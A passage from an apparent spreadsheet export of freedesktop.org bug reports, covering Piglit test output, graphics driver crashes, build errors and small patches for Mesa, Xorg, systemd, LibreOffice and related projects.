Testing NEAREST with swizzling: MIRRORED_REPEAT
Testing NEAREST with swizzling: MIRROR_CLAMP_EXT
Testing NEAREST with swizzling: MIRROR_CLAMP_TO_EDGE_EXT
Testing NEAREST with swizzling: MIRROR_CLAMP_TO_BORDER_EXT
Probe at (62936) @ 00
  Expected: 127 0 255
  Observed: 0 255 128
Testing LINEAR with swizzling: REPEAT
Testing LINEAR with swizzling: CLAMP
Probe at (95125) @ 00
  Expected: 63 127 127
  Observed: 0 255 64
Testing LINEAR with swizzling: CLAMP_TO_EDGE
Testing LINEAR with swizzling: CLAMP_TO_BORDER
Probe at (273125) @ 00
  Expected: 127 0 255
  Observed: 0 255 128
Testing LINEAR with swizzling: MIRRORED_REPEAT
Testing LINEAR with swizzling: MIRROR_CLAMP_EXT
Probe at (451125) @ 00
  Expected: 191 0 255
  Observed: 128 128 191
Testing LINEAR with swizzling: MIRROR_CLAMP_TO_EDGE_EXT
Testing LINEAR with swizzling: MIRROR_CLAMP_TO_BORDER_EXT
Probe at (629125) @ 00
  Expected: 127 0 255
  Observed: 0 255 128
Testing NEAREST with projective mapping and swizzling: REPEAT
Testing NEAREST with projective mapping and swizzling: CLAMP
Testing NEAREST with projective mapping and swizzling: CLAMP_TO_EDGE
Testing NEAREST with projective mapping and swizzling: CLAMP_TO_BORDER
Probe at (27336) @ 00
  Expected: 127 0 255
  Observed: 0 255 128
Testing NEAREST with projective mapping and swizzling: MIRRORED_REPEAT
Testing NEAREST with projective mapping and swizzling: MIRROR_CLAMP_EXT
Testing NEAREST with projective mapping and swizzling: MIRROR_CLAMP_TO_EDGE_EXT
Testing NEAREST with projective mapping and swizzling: MIRROR_CLAMP_TO_BORDER_EXT
Probe at (62936) @ 00
  Expected: 127 0 255
  Observed: 0 255 128
Testing LINEAR with projective mapping and swizzling: REPEAT
Testing LINEAR with projective mapping and swizzling: CLAMP
Probe at (95125) @ 00
  Expected: 63 127 127
  Observed: 0 255 64
Testing LINEAR with projective mapping and swizzling: CLAMP_TO_EDGE
Testing LINEAR with projective mapping and swizzling: CLAMP_TO_BORDER
Probe at (273125) @ 00
  Expected: 127 0 255
  Observed: 0 255 128
Testing LINEAR with projective mapping and swizzling: MIRRORED_REPEAT
Testing LINEAR with projective mapping and swizzling: MIRROR_CLAMP_EXT
Probe at (451125) @ 00
  Expected: 191 0 255
  Observed: 128 128 191
Testing LINEAR with projective mapping and swizzling: MIRROR_CLAMP_TO_EDGE_EXT
Testing LINEAR with projective mapping and swizzling: MIRROR_CLAMP_TO_BORDER_EXT
Probe at (629125) @ 00
  Expected: 127 0 255
  Observed: 0 255 128
PIGLIT: {'result': 'fail' }</t>
  </si>
  <si>
    <t>DRI-91694</t>
  </si>
  <si>
    <t>[SKL] Low performance of rendering on UXA</t>
  </si>
  <si>
    <t>Created attachment 117796
dmesg
HD Graphics 530 when I am switching to full screen window on i3wm and back it takes long time like its on heavy load. When I am watching movie and doing someting else on other monitor it skips frames until operation is done - mostly when I am switching to full screen also on slim also . It doesn't happen on SNA or BLT but  when I switch into SNA or BLT it doesn't render properly my movie when I am switching for example to full screen on my player only player controls goes into full screen the view of the movie is staying at the same resolution it was. Also on SNA and BLT  I get some flickers on when I am typing login into slim manager. 
On UXA also switching tabs on firefox takes lot of time. 
The similar problems I am experiencing on KDE.
kernel version drm-intel-next from 2015-08-18 xf86-video-intel-2.99.917-r2</t>
  </si>
  <si>
    <t>januszmk6</t>
  </si>
  <si>
    <t>XORG-761</t>
  </si>
  <si>
    <t>xdm walks /dev/mem</t>
  </si>
  <si>
    <t>As I understand it this is to gather random data.  Shouldn't it use /dev/random
or /dev/urandom?</t>
  </si>
  <si>
    <t>lhh</t>
  </si>
  <si>
    <t>SYSTEMD-69391</t>
  </si>
  <si>
    <t>systemd-delta shows snippets in /run created by systemd itself</t>
  </si>
  <si>
    <t>According to the the man page systemd-delta is meant to show differences between files in /usr and /etc. It does however also show snippets created by systemd itself in /run which contradicts this statement and is probably not useful information for the user anyway (v207):
[EXTENDED]   /run/systemd/system/session-1.scope â†’ /run/systemd/system/session-1.scope.d/90-SendSIGHUP.conf
[EXTENDED]   /run/systemd/system/session-1.scope â†’ /run/systemd/system/session-1.scope.d/90-TimeoutStopUSec.conf
[EXTENDED]   /run/systemd/system/session-1.scope â†’ /run/systemd/system/session-1.scope.d/90-KillMode.conf
[EXTENDED]   /run/systemd/system/session-1.scope â†’ /run/systemd/system/session-1.scope.d/90-After-systemd-user-sessions\x2eservice.conf
[EXTENDED]   /run/systemd/system/session-1.scope â†’ /run/systemd/system/session-1.scope.d/90-Description.conf
[EXTENDED]   /run/systemd/system/session-1.scope â†’ /run/systemd/system/session-1.scope.d/90-Slice.conf</t>
  </si>
  <si>
    <t>DBUS-37847</t>
  </si>
  <si>
    <t>regression tests assume python is in PATH and somewhat modern</t>
  </si>
  <si>
    <t>The regression tests assume a working python in $PATH. This should be checked in configure.ac or something.</t>
  </si>
  <si>
    <t>XORG-22969</t>
  </si>
  <si>
    <t>flickering when playing video under invertion</t>
  </si>
  <si>
    <t>Created attachment 28042
Xorg.0.log
Forwarding this Canonical customer-critical issue from launchpad:
https://bugs.edge.launchpad.net/ubuntu/+source/xserver-xorg-video-intel/+bug/405425
[Problem]
When executing adobe air application that includes a invert screen effect heavy flickering can be noticed on the display.
This issue is seen on Jaunty but with the Karmic X stack and kernel.
[Original Report]
Hardware Platfform :Dell Optiplex 760 with Intel Corporation 4 Series Chipset Integrated Graphics Controller.
Ubuntu Version: 9.04
Intel Driver version: 2:2.8.0+git20090724.9a45ace2-0ubuntu0sarvatt~jaunty
X version: 2:1.6.2+git20090724+server-1.6-branch.606f6dba-0ubuntu0sarvatt2~jaunty
Kernel version: linux-image-2.6.31-020631rc4-generic
Description of the issue: When executing adobe air application that includes a invert screen effect heavy flickering can be noticed on the display. A video of the issue can be accessed at :
http://people.canonical.com/~luislopez/Dell_Optiplex_760_Display_Flickering_on_Adobe_Air_Application.avi
[lpci]
00:00.0 Host bridge [0600]: Intel Corporation 4 Series Chipset DRAM Controller [8086:2e10] (rev 03)
	Subsystem: Dell Device [1028:027f]
00:02.0 VGA compatible controller [0300]: Intel Corporation 4 Series Chipset Integrated Graphics Controller [8086:2e12] (rev 03)
	Subsystem: Dell Device [1028:027f]</t>
  </si>
  <si>
    <t>XKEYBOARD-CONFIG-12893</t>
  </si>
  <si>
    <t>Komi keyboard layout</t>
  </si>
  <si>
    <t>Komi ( also known as Zyrian or Komi-Zyrianis ) is a language based on cyrillic (russian).  
http://en.wikipedia.org/wiki/Komi_language for details.
The simple layout has been prepared.</t>
  </si>
  <si>
    <t>lumpen.intellectual</t>
  </si>
  <si>
    <t>DRI-109257</t>
  </si>
  <si>
    <t>[igt] new compilation error with GCC 9</t>
  </si>
  <si>
    <t>I see following error:
igt_fb.c:1382:12: error: array subscript 2 is outside array bounds of 'struct igt_vec4[2]' [-Werror=array-bounds]
 1382 |  rgb-&gt;d[0] = rgb24[2]
      |  ~~~~~~~~~~^~~~~~~~~~
igt_fb.c:1549:20: note: while referencing 'rgb'
 1549 |    struct igt_vec4 rgb[2]
      |                    ^~~
igt_fb.c:1383:12: error: array subscript 2 is outside array bounds of 'struct igt_vec4[2]' [-Werror=array-bounds]
 1383 |  rgb-&gt;d[1] = rgb24[1]
      |  ~~~~~~~~~~^~~~~~~~~~
igt_fb.c:1549:20: note: while referencing 'rgb'
 1549 |    struct igt_vec4 rgb[2]
      |                    ^~~
igt_fb.c:1384:12: error: array subscript 2 is outside array bounds of 'struct igt_vec4[2]' [-Werror=array-bounds]
 1384 |  rgb-&gt;d[2] = rgb24[0]
      |  ~~~~~~~~~~^~~~~~~~~~
igt_fb.c:1549:20: note: while referencing 'rgb'
 1549 |    struct igt_vec4 rgb[2]
      |                    ^~~
igt_fb.c:1385:12: error: array subscript 2 is outside array bounds of 'struct igt_vec4[2]' [-Werror=array-bounds]
 1385 |  rgb-&gt;d[3] = 1.0f
      |  ~~~~~~~~~~^~~~~~
igt_fb.c:1549:20: note: while referencing 'rgb'
 1549 |    struct igt_vec4 rgb[2]
      |                    ^~~
I guess it's a typo and should be fixed by:
diff --git a/lib/igt_fb.c b/lib/igt_fb.c
index 8244e517..5cd1829a 100644
--- a/lib/igt_fb.c
+++ b/lib/igt_fb.c
@@ -17797 +17797 @@ static void convert_rgb24_to_nv12(struct fb_convert *cvt)
 			struct igt_vec4 yuv[2]
 			read_rgb(
-			read_rgb(
+			read_rgb(
 			yuv[0] = igt_matrix_transform(
 			yuv[1] = igt_matrix_transform(</t>
  </si>
  <si>
    <t>mliska</t>
  </si>
  <si>
    <t>MESA-15945</t>
  </si>
  <si>
    <t>[AvP1 Alien Demo (wine)] flickering artifacts</t>
  </si>
  <si>
    <t>Hi there
I'm referring to bug 12944 in the wine bugtracker. Please also see the URL for that.
Problem is a flickering artifact during the intro sequence of the AvP1 Alien Demo. You can find a download link in the wine bugreport.
This does not seem to be related to wine's D3D translation. It does NOT appear on nvidia cards (binary blob) and not with LIBGL_ALWAYS_INDIRECT=1 (software rendering).
I could reproduce it on both a i915 chip with mesa GIT (and i915tex driver) and a i945 with mesa 6.5.2.
The problem is nearly the same. On the i915 the artifacts shows only for a short time (see wine bugreport) and on the i945 during the full intro sequence.
The problem also depends on how RenderTargetLockMode in wine it set. This dictates how wine modifies the framebuffer.
I can only modify the i915 system since I've no root access to the i945 system.
Greetings
Tobias Jakobi</t>
  </si>
  <si>
    <t>TELEPATHY-29076</t>
  </si>
  <si>
    <t>misc cleanup</t>
  </si>
  <si>
    <t>See branch:
http://git.collabora.co.uk/?p=user/smcv/haze-smcv.gita=shortlogh=refs/heads/misc</t>
  </si>
  <si>
    <t>TELEPATHY-70962</t>
  </si>
  <si>
    <t>Use the right ICE Call capability</t>
  </si>
  <si>
    <t>Gabble uses TP_IFACE_CHANNEL_TYPE_CALL1 /ice-udp while it's actually just '/ice' see http://telepathy.freedesktop.org/spec/Channel_Type_Call.html#Handler-Capability-Token:ice</t>
  </si>
  <si>
    <t>MESA-31383</t>
  </si>
  <si>
    <t>[r600g] crash when using xeglthreads</t>
  </si>
  <si>
    <t>Using mesa git e7f5d19a1106351f2db8f62f59f51be86eaa93df
kernel 2.6.36 (kernel-2.6.35.6-37.fc13.x86_64)
libdrm git
xf86-video-ati git 
I'm able to duplicate a crash in r600g pretty reliably with this command 
./xeglthreads -n 6 -t -l
it gives an error:  r600_priv.h:184: radeon_bo_unmap: Assertion `bo-&gt;map_count &gt;= 0' failed.
works ok with -n values &lt; 6 but real performance drop between 4 &amp; 5</t>
  </si>
  <si>
    <t>XORG-49446</t>
  </si>
  <si>
    <t>[i915GM] glitches in some UI widgets using SNA</t>
  </si>
  <si>
    <t>Created attachment 60995
X.org log file
My system has been updated with packages from the xorg-edgers PPA (https://launchpad.net/~xorg-edgers/+archive/ppa).  However after upgrading from the xserver-xorg-video-intel driver in the xorg-edgers PPA to the SNA version available in the intel-sna PPA (https://launchpad.net/~sarvatt/+archive/intel-sna) I notice a scrollbar drawing glitch in applications using the oxygen-gtk theme.  Both PPAs mentioned above feature the same driver version number (2:2.19.0+git20120501.7e09babb).
I have attached my Xorg.log.0 and a screenshot showing the drawing glitch.
** My System **
OS: Kubuntu 12.04 i386 w/ KDE SC 4.8.2
PC: HP Pavilion dv1550se laptop
CPU: Intel(R) Pentium(R) M processor 1.60GHz
RAM: 1.5GB DDR400
Video: Mobile 915GM/GMS/910GML Express Graphics Controller
Sound: 82801FB/FBM/FR/FW/FRW (ICH6 Family) AC'97 Audio Controller
Linux Kernel: 3.2.0-24-generic
Screen Resolution: 1280 x 768</t>
  </si>
  <si>
    <t>s_chriscollins</t>
  </si>
  <si>
    <t>MESA-68262</t>
  </si>
  <si>
    <t>[build error with wayland &lt; 1.2.0] wayland-drm.c:110:3: error: implicit declaration of function 'wl_resource_create'</t>
  </si>
  <si>
    <t>I am getting this compile error on current git with wayland 1.1.0:
  CC     wayland-drm.lo
wayland-drm.c: In function 'create_buffer':
wayland-drm.c:110:3: error: implicit declaration of function 'wl_resource_create' [-Werror=implicit-function-declaration]
wayland-drm.c:109:19: warning: assignment makes pointer from integer without a cast [enabled by default]
wayland-drm.c:117:2: error: implicit declaration of function 'wl_resource_set_implementation' [-Werror=implicit-function-declaration]
wayland-drm.c: In function 'bind_drm':
wayland-drm.c:214:11: warning: assignment makes pointer from integer without a cast [enabled by default]
wayland-drm.c:217:3: error: implicit declaration of function 'wl_client_post_no_memory' [-Werror=implicit-function-declaration]
wayland-drm.c: In function 'wayland_drm_buffer_get':
wayland-drm.c:251:2: error: implicit declaration of function 'wl_resource_instance_of' [-Werror=implicit-function-declaration]
wayland-drm.c:253:3: error: implicit declaration of function 'wl_resource_get_user_data' [-Werror=implicit-function-declaration]
wayland-drm.c:253:3: warning: return makes pointer from integer without a cast [enabled by default]
wayland-drm.c: In function 'wayland_drm_init':
wayland-drm.c:273:2: error: implicit declaration of function 'wl_global_create' [-Werror=implicit-function-declaration]
Full log here: https://launchpadlibrarian.net/147916809/buildlog_ubuntu-raring-i386.mesa_9.3~git1308190858.d13003~gd~r_FAILEDTOBUILD.txt.gz
When building with wayland 1.2.0 it's OK.
If 1.2 is now required as implied by:
http://cgit.freedesktop.org/mesa/mesa/commit/?id=8d29b5271a2e66fc78436be31ed6748ff006f0cb
then this patch should be applied:
http://lists.freedesktop.org/archives/mesa-dev/2013-August/043210.html</t>
  </si>
  <si>
    <t>DRI-83120</t>
  </si>
  <si>
    <t>[BSW Bisected]system boot fail</t>
  </si>
  <si>
    <t>==System Environment==
--------------------------
Regression: YES
Non-working platforms: BSW
==kernel==
--------------------------
origin/drm-intel-nightly: d82af52b1766594ece621e427f1604194ca2b415
    drm-intel-nightly: 2014y-08m-25d-23h-30m-00s integration manifest
origin/drm-intel-next-queued: 0f09bb2bf3d51a1e57e8dfc46e3c159170651c29
    drm/i915/bdw: Make sure error capture keeps working with Execlists
origin/drm-intel-fixes: 1a125d8a2c22b11741fc47d4ffcf7a5ffa044dd3
    drm/i915: don't try to retrain a DP link on an inactive CRTC
==Bug detailed description==
System boot fail It happens on -nightly and -queued kernel works well on -fixes kernel.
It only happens on BSW. 
The latest known good commit: 3a5f87c286515c54ff5c52c3e64d0c522b7570c0
The latest known bad commit: 0f09bb2bf3d51a1e57e8dfc46e3c159170651c29
==Reproduce steps==
---------------------------- 
1. clean boot system.</t>
  </si>
  <si>
    <t>LIBREOFFICE-62690</t>
  </si>
  <si>
    <t>FILESAVE Outline default text with gigantic character size</t>
  </si>
  <si>
    <t>Created attachment 76960
Test Kit
Steps how to reproduce with server installation of LibreOffice 3.5.7.2  German UI/Locale [Build-ID: 3215f89-f603614-ab984f2-7348103-1225a5b] on German WIN7 Home Premium (64bit) 
0. Launch LibO
1. From Start center created new Presentation without using wizard
   &gt; Shows slide with default contents Title Slide layout
2. In Layouts apply Title Content
   Shows Title + Single Line Outline with request Click to add text
3. Save -&gt; Close -&gt; Reopen
   &gt; Expected: looks like did when save character size 32 or so for outline
   &gt; Actual: visible character size 100 or so although still shown 32
Definitively a FILESAVE problem sample from 3.5.7.2 also loosks damaged when opened in 3.3.3
Was still ok with 3.3.3 and 3.4.5
No longer reproducible with parallel Dev-installation of  Version 4.1.0.0.alpha0+ (Build ID: 094bab7f9097fba62800d3dd578bd42640d8c6e2) TinderBox: Win-x86@6 Branch:master Pull Time: 2013-03-18_01:35:56 ENGLISH UI / German Locale on German WIN7 Home Premium (64bit) with LODev/4 Masters User Profile.
In attached Test Kit you find some results for saving from various LibO versions and a screenshot showing too big character height.</t>
  </si>
  <si>
    <t>LIBREOFFICE-35784</t>
  </si>
  <si>
    <t>EDITING - unable to update postgresql databases using postgres SDBC driver</t>
  </si>
  <si>
    <t>When using Base to access a postgresql database with the postgresql driver it is impossible to insert-update-delete rows in the database.
The bug is reproducible with a minimal postgresql database containing the following table :
create table test_table (
  id serial primary key
  label text
)
Libreoffice 3.3.1 OOO330m19 (Build:8)
Postgresql 8.4
Ubuntu 10.04LTS
Regards</t>
  </si>
  <si>
    <t>HARFBUZZ-39699</t>
  </si>
  <si>
    <t>[PATCH] Make glib dependency unnecessary on x86/amd64 + GCC</t>
  </si>
  <si>
    <t>Requiring glib for just a few defines is dumb.</t>
  </si>
  <si>
    <t>kiputnik.spam</t>
  </si>
  <si>
    <t>XDG-APP-95154</t>
  </si>
  <si>
    <t>open &amp; save dialogs do not show bookmarks</t>
  </si>
  <si>
    <t>Open and Save dialogs do not show bookmarks.
Non-xdg-appified applications do typically[1] show bookmarks in open and save dialogs and Nautilus has these same bookmarks on the sidebar.
Perhaps portals when implemented will just happen to solve this issue.
([1] Sometimes gvfs-based bookmarks and mounts such as unmounted sshfs locations do not show up in apps... but that's completely unrelated to this issue.)</t>
  </si>
  <si>
    <t>garrettl</t>
  </si>
  <si>
    <t>DRI-88934</t>
  </si>
  <si>
    <t>[ILK]unplug DP will cause dmesg error.</t>
  </si>
  <si>
    <t>==System Environment==
--------------------------
Regression:  yes
will bisect later.
no-working platforms: ILK
==kernel==
--------------------------
drm-intel-testing/e0f77e2aeee065f8530ef87a9842fee5e89ea681
==Bug detailed description==
-----------------------------
start with eDP and plug/unplug DP monitor will cause dmesg error.
[  241.744627] WARNING: CPU: 1 PID: 3717 at drivers/gpu/drm/drm_irq.c:1129 drm_wait_one_vblank+0x35/0x141 [drm]()
[  241.744831] Modules linked in: snd_hda_codec_hdmi snd_hda_codec_idt snd_hda_codec_generic firewire_ohci i2c_i801 snd_hda_intel snd_hda_controller snd_hda_codec snd_hwdep lpc_ich mfd_core firewire_core crc_itu_t snd_pcm snd_timer bcma snd soundcore dm_mod parport_pc parport tpm_tis tpm wmi battery ac acpi_cpufreq joydev i915 button video drm_kms_helper drm cfbfillrect cfbimgblt cfbcopyarea
[  241.745620] CPU: 1 PID: 3717 Comm: kworker/1:3 Tainted: G        W      3.19.0-rc6_drm-intel-testing_e0f77e_20150131_+ #150
[  241.746755]  [] ? drm_wait_one_vblank+0x35/0x141 [drm]
[  241.746973]  [] drm_wait_one_vblank+0x35/0x141 [drm]
[  241.748353]  [] ? kfree_state+0x42/0x45 [drm]
[  241.748626]  [] ? drm_mode_plane_set_obj_prop+0x47/0x5a [drm]
[  241.748691]  [] drm_mode_set_config_internal+0x47/0xb2 [drm]
[  241.748804]  [] restore_fbdev_mode+0xa5/0xc4 [drm_kms_helper]
[  241.748927]  [] drm_fb_helper_restore_fbdev_mode_unlocked+0x1f/0x4c [drm_kms_helper]
[  241.749079]  [] drm_fb_helper_set_par+0x30/0x34 [drm_kms_helper]
[  241.749207]  [] drm_fb_helper_hotplug_event+0x92/0x9b [drm_kms_helper]
[  241.756648]  [] drm_kms_helper_hotplug_event+0x21/0x24 [drm_kms_helper]
==Reproduce steps==
---------------------------- 
1. start with eDP
2. Plug DP monior.
3. Unplyg DP monitor.
4. Check dmesg.</t>
  </si>
  <si>
    <t>LIBREOFFICE-37764</t>
  </si>
  <si>
    <t>IsBlank() returns False for an empty field in other ods file</t>
  </si>
  <si>
    <t>Created attachment 47336
Zip file containg data.ods and formula.ods
Using LibO_3.4.0rc2_MacOS_x86_install_en-US I get the wrong result from the IsBlank() function when it is referencing a cell in another ods file.
I have attached a zip with 2 sample files. The file data.ods has an empty A1 formulas with IsBlank() in A2 and A3 showing the correct result.
The file formula.ods has the corresponding formulas in A2 and A3 but referencing A1 from data.ods. And A2 and A3 displays the wrong output.</t>
  </si>
  <si>
    <t>PACKAGEKIT-16663</t>
  </si>
  <si>
    <t>packagekit-gnome crash when adding to list</t>
  </si>
  <si>
    <t>Hi
In 
  https://bugs.edge.launchpad.net/ubuntu/+source/packagekit-gnome/+bug/246255
a user reported a segfault when going to install a package from the list.
It is reproducible with 0.2.1 when clicking the checkbox next to a package
or choosing Add to list but not when double clicking.
Here is the stacktrace that I obtained:
#0 0xb727acc8 in strcmp () from /lib/tls/i686/cmov/libc.so.6
#1 0xb7eabebc in pk_strequal (id1=0x8062f29 separator
    id2=0x8062f29 separator) at pk-common.c:478
#2 0x0804f2da in gpk_application_group_row_separator_func (model=0x823ad40
    iter=0xbfe47ebc data=0x0) at gpk-application.c:2312
#3 0xb7bda311 in gtk_tree_view_real_set_cursor (tree_view=0x8149330
    path=0x8270ba8 clear_and_select=1 clamp_node=1)
    at /build/buildd/gtk+2.0-2.13.3/gtk/gtktreeview.c:2436
#4 0xb7be4d9d in gtk_tree_view_button_press (widget=0x8149330
    event=0x82d0020) at /build/buildd/gtk+2.0-2.13.3/gtk/gtktreeview.c:2693
#5 0xb7acd7b2 in _gtk_marshal_BOOLEAN__BOXED (closure=0x809fc48
    return_value=0xbfe481a0 n_param_values=2 param_values=0xbfe48258
    invocation_hint=0xbfe4818c marshal_data=0xb7be4580)
    at /build/buildd/gtk+2.0-2.13.3/gtk/gtkmarshalers.c:84
#6 0xb75801d9 in ?? () from /usr/lib/libgobject-2.0.so.0
#7 0xb7581a5b in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
#8 0xb75980dd in ?? () from /usr/lib/libgobject-2.0.so.0
#9 0xb7599a28 in g_signal_emit_valist () from /usr/lib/libgobject-2.0.so.0
#10 0xb759a016 in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
#11 0xb7bf9e7e in gtk_widget_event_internal (widget=0x8149330 event=0x82d0020)
    at /build/buildd/gtk+2.0-2.13.3/gtk/gtkwidget.c:4706
#12 0xb7ac54fa in IA__gtk_propagate_event (widget=0x8149330 event=0x82d0020)
    at /build/buildd/gtk+2.0-2.13.3/gtk/gtkmain.c:2343
---Type  to continue or q  to quit---
#13 0xb7ac68ff in IA__gtk_main_do_event (event=0x82d0020)
    at /build/buildd/gtk+2.0-2.13.3/gtk/gtkmain.c:1563
#14 0xb7941a5a in gdk_event_dispatch (source=0x80973d0 callback=0
    user_data=0x0) at /build/buildd/gtk+2.0-2.13.3/gdk/x11/gdkevents-x11.c:2365
#15 0xb74ef5e8 in g_main_context_dispatch () from /usr/lib/libglib-2.0.so.0
#16 0xb74f2c93 in ?? () from /usr/lib/libglib-2.0.so.0
#17 0xb74f31b2 in g_main_loop_run () from /usr/lib/libglib-2.0.so.0
#18 0xb7ac6e99 in IA__gtk_main ()
    at /build/buildd/gtk+2.0-2.13.3/gtk/gtkmain.c:1169
#19 0x0804e498 in main (argc=1 argv=0xbfe487e4) at gpk-application-main.c:130
Let me know what extra information I can provide.
Thanks
James</t>
  </si>
  <si>
    <t>CAIRO-54664</t>
  </si>
  <si>
    <t>Firefox crashes after xlib: Implement SHM fallbacks and fast upload paths</t>
  </si>
  <si>
    <t>Created attachment 66830
gdb bt full
Firefox build with system cairo is broken right now patch from https://bugzilla.mozilla.org/show_bug.cgi?id=722975 can be used to fix it.
I'm building Fx with system cairo and it crashes sometimes during browsing after: 
0bfd2acd35547fc2bd0de99cc67d153f0170697d is the first bad commit
commit 0bfd2acd35547fc2bd0de99cc67d153f0170697d
Author: Chris Wilson 
Date:   Mon Aug 13 01:34:12 2012 +0100
    xlib: Implement SHM fallbacks and fast upload paths
    Signed-off-by: Chris Wilson 
:100644 100644 0067bfc91678ab6af013f89fca68e550b55737e2 3d668b6852bd67dbca71afe6e3206675aae15554 M	configure.ac
:040000 040000 0f0c60329019ef0fbb14221ac7a53dfa74467d2b 199d5653aae82ccddbba67d320375b05a31bde8d M	src
gdb `bt full` with cairo debug build can be found in the attached file. Unfortunately Firefox itself is Release build so symbols from libxul.so are missing.
AFAIU Fx somehow set surface to _cairo_surface_nil which set backend = NULL and then there is nullptr dereference in:
@@ -737 +737 @@ _cairo_image_surface_is_clone (cairo_image_surface_t *image)
 static inline cairo_bool_t
 _cairo_surface_is_image (const cairo_surface_t *surface)
 {
-    return surface-&gt;backend == 
+    return surface-&gt;backend-&gt;type == CAIRO_SURFACE_TYPE_IMAGE
 }
 /**
Please tell me if any additional info (such as backtrace of Fx Debug build) is needed for investigation.</t>
  </si>
  <si>
    <t>TELEPATHY-53100</t>
  </si>
  <si>
    <t>duplicate declaration of TpBaseConnection</t>
  </si>
  <si>
    <t>Cross-platform environments don't admit redeclarations
In file included from /var/lib/buildbot/telepathy/yts-android-r11-amd64/build/telepathy-glib/telepathy-glib/base-channel.h:32
                 from /var/lib/buildbot/telepathy/yts-android-r11-amd64/build/telepathy-android/jni/../../telepathy-glib/telepathy-glib/base-call-channel.h:29
                 from /var/lib/buildbot/telepathy/yts-android-r11-amd64/build/telepathy-android/jni/../../telepathy-glib/telepathy-glib/base-call-channel.c:103:
/var/lib/buildbot/telepathy/yts-android-r11-amd64/build/telepathy-glib/telepathy-glib/base-connection.h: At top level:
/var/lib/buildbot/telepathy/yts-android-r11-amd64/build/telepathy-glib/telepathy-glib/base-connection.h:41: error: redefinition of typedef 'TpBaseConnection'
/var/lib/buildbot/telepathy/yts-android-r11-amd64/build/telepathy-glib/telepathy-glib/handle-repo.h:41: note: previous declaration of 'TpBaseConnection' was here
make: *** [obj/local/armeabi/objs-debug/telepathy-glib/base-call-channel.o] Error 1
program finished with exit code 2
See the full build log here:
http://buildbot.telepathy.im/builders/telepathy-android - r11/builds/282/steps/compile/logs/stdio</t>
  </si>
  <si>
    <t>XORG-25765</t>
  </si>
  <si>
    <t>X server crash with linux 2.6.32 (KMS) xorg-intel 2.9.1 libdrm 2.4.15 on EeePC 900 (915GM/GMS/910GML)</t>
  </si>
  <si>
    <t>Created attachment 32256
system state after crash and automatic (but weirdly broken) gdm restart
I just had an X server crash with linux 2.6.32 (KMS enabled) xorg-intel 2.9.1 libdrm 2.4.15 on an EeePC 900 (lspci reports 915GM/GMS/910GML).
after the X server crashed i got dumped back to vt1 and then gdm restarted a new X server.  But gdm was really oddly-behaved: the screen would update when a switched to it (with ctrl-alt-F8) but then when i interacted with it nothing would visually update (only the mouse cursor would move) and the input box for gdm had a black bar over it (it's usually white).  switching away to vt1 and then back would repaint the screen with the outcome of whatever activity i'd done but it would still not be an active screen.
a second restart of gdm didn't resolve the problem either.
i grabbed a gpu dump after the automated gdm restart (but before i'd restarted it by hand).  i'm attaching a dump of the system state including that gpu dump gathered by the script i posted here as attachment 31967).
Some interesting output in the gdm log from the crashed session (full log included in the attached tarball):
Errors from xkbcomp are not fatal to the X server
../../../libdrm/intel/intel_bufmgr_gem.c:899: Error setting domain 835: Input/output error
../../../libdrm/intel/intel_bufmgr_gem.c:825: Error setting to CPU domain 518: Input/output error
Fatal server error:
Failed to map batchbuffer: Input/output error
Please consult the The X.Org Foundation support 
         at http://wiki.x.org
 for help. 
Please also check the log file at /var/log/Xorg.0.log for additional information.
X: ../../src/i830_batchbuffer.h:79: intel_batch_emit_dword: Assertion `pI830-&gt;batch_ptr != ((void *)0)' failed.
the relevant bit of dmesg appears to be:
[172107.332058] [drm:i915_hangcheck_elapsed] *ERROR* Hangcheck timer elapsed... 
GPU hung
[172107.332071] render error detected EIR: 0x00000000
[172107.332077] i915: Waking up sleeping processes
[172107.332094] [drm:i915_wait_request] *ERROR* i915_wait_request returns -5 (aw
aiting 7486395 at 7486371)
[172107.332377] reboot required
[172107.335458] [drm:i915_gem_execbuffer] *ERROR* Execbuf while wedged
[172107.632013] [drm:i915_hangcheck_elapsed] *ERROR* Hangcheck timer elapsed... 
GPU hung
[172107.632025] render error detected EIR: 0x00000000
[172107.632030] i915: Waking up sleeping processes
[172107.833838] reboot required
full dmesg is also within the attached tarball if you want more.  Is that reboot required something that should be propagated out to the user more directly somehow?
After a full system reboot things seem to be back to normal.
please let me know if i can do anything to help debug this.</t>
  </si>
  <si>
    <t>dkg</t>
  </si>
  <si>
    <t>POPPLER-91055</t>
  </si>
  <si>
    <t>poppler SplashFontSrc leaking in SplashOutputDev::doUpdateFont</t>
  </si>
  <si>
    <t>Created attachment 116648
This is suggested patch/fix for poppler/SplashOutputDev.cc
This fontsrc local variable in SplashOutputDev::doUpdateFont leaks memory.
I don't really undestand the code however looks like it just needs to be unreferenced regardless of if it is file.
Attached is the patch for poppler/SplashOutputDev.cc</t>
  </si>
  <si>
    <t>XORG-77000</t>
  </si>
  <si>
    <t>[Regression][Bisected] Touchpad gets stuck thinking there's two fingers present</t>
  </si>
  <si>
    <t>Created attachment 96843
Sample log with error
Recently I've noticed that the multitouch on my touchpad is extremely unreliable. Most times after booting my system and loading X11 using more then one finger with the touchpad causes it to get stuck thinking there is more then one finger on the touchpad at all times even after lifting both fingers and only using one on the touchpad. This makes the touchpad pretty much unusable and the only thing that seems to fix it is switching to another VT and then switching back but then if I try to use more then one finger it gets stuck with the exact same issue until I switch VTs again. Occasionally if I restart X11 enough times I'll get lucky and get a single instance where the bug doesn't seem to come up and I can use the computer normally but then occasionally locking gnome or putting the laptop in standby and taking it out again will cause the bug to reemerge then I have to keep restarting X11 until I get lucky again.
I've finally got the chance to investigate the bug more (it's been happening for quite some time) and have bisected it and figured out what commit caused the bug. The first bad commit appears to be 2e5c0cf4395a0cf7b024495deab75f4ebe949e9a: eventcomm: drop mtdev.
I've attached some logs where Xorg actually reports that something's gone wrong with touchpad but it seems unfortunately I didn't have any debugging symbols present. The bug doesn't always show in the logs though so I'll compile in the debugging symbols and add better logs if it comes up again.
I'm currently running a ThinkPad Helix on Gentoo Linux with kernel version 3.12.13. I'm using the latest synaptics driver available from the git repo and running xorg-server version 1.15.</t>
  </si>
  <si>
    <t>lyude</t>
  </si>
  <si>
    <t>LIBOIL-5162</t>
  </si>
  <si>
    <t>stride test crashes with -v option</t>
  </si>
  <si>
    <t>The first argument must be referenced with argv[1].</t>
  </si>
  <si>
    <t>MESA-7266</t>
  </si>
  <si>
    <t>Segfault in update_input_ptrs (tnl/t_vertex.c:387) with GLSL code enabled.</t>
  </si>
  <si>
